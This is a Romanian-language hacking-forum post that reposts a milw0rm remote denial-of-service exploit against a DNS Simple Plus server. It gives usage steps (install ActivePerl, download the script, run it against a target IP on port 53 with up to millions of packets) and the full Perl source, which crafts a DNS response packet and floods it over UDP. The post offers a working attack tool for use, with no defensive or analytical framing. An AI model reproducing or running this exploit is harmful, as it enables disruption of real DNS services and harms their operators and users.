Jump to content
puskin

-milw0rm-DNS Plus-Remote Denial of Service Exploit-COMPILED

By puskin, in Exploituri

Recommended Posts

puskin Newbie

puskin

Posted
Posted

-milw0rm-DNS Simple Plus-Remote Denial of Service Exploit-COMPILED

Credit: http://www.milw0rm.com/exploits/6059

Instalati Active Pearl:

http://rapidshare.com/files/129457472/ActivePerl-5.10.0.1002-MSWin32-x86-283697.msi.html

va crea directoarele:

-Perl:

-bin

-etc

-eg

-html

-lib

Exploit:

http://rapidshare.com/files/129458504/sdns-dos.pl.html

Intrati in Start>Run si tastati locatia directorului unde aveti exploitul

sdns-dos.pl (se poate edita cu wordpad ff.simplu) ex:

C:\Documents and Settings\User\Desktop\sdns-dos.pl

dati run si introduceti adresa serverului:

89.34.21.111 (luat la intamplare ca exemplu..)

portul dns 53

nr. de pachete expediate intre 10000 si 10000000

cam asa trebuie sa arate in consola "Run":

C:\Documets and...\Desktop\sdns-dos.pl 89.34.21.111 53 1000000

Cod :


use IO::Socket;

if(@ARGV < 3){
print("sdns-dos.pl <dns server> <dns source port> <num of packets>");
}
$sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server");



$address = $ARGV[0];

$trans = pack("H4","1337");
$flags = pack("B16","1000010110110000");
$question = pack("H4","0001");
$answerRR = pack("H4","0001");
$authorityRR = pack("H4","0000");
$additionlRR = pack("H4","0000");
$type = pack("H4","0001"); # A host name
$class = pack("H4","0001"); # IN

@parts = split(/\./,$address);
foreach $part (@parts)
{
 $packedlen = pack("H2",sprintf("%02x",length($part)));
 $address2 .= $packedlen.$part;
}
$query = $address2. "\000" . $type . $class;

$aname = pack("H4","c00c");
$atype = pack("H4","0001");
$aclass = pack("H4","0001");
$ttl = pack("H8","0000008d");
$dlen = pack("H4","0004");
$addr = inet_aton("127.0.0.1");
$answer = $aname . $atype . $aclass . $ttl . $dlen . $addr;

$payload = $trans . $flags . $question . $answerRR
. $authorityRR . $additionlRR . $query . $answer;

print "sending $ARGV[2] packets… ";
for($i=0;$i<=$ARGV[2];$i++)
{
 print $sock $payload;
}
print "Done. Good bye.";
__END__

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...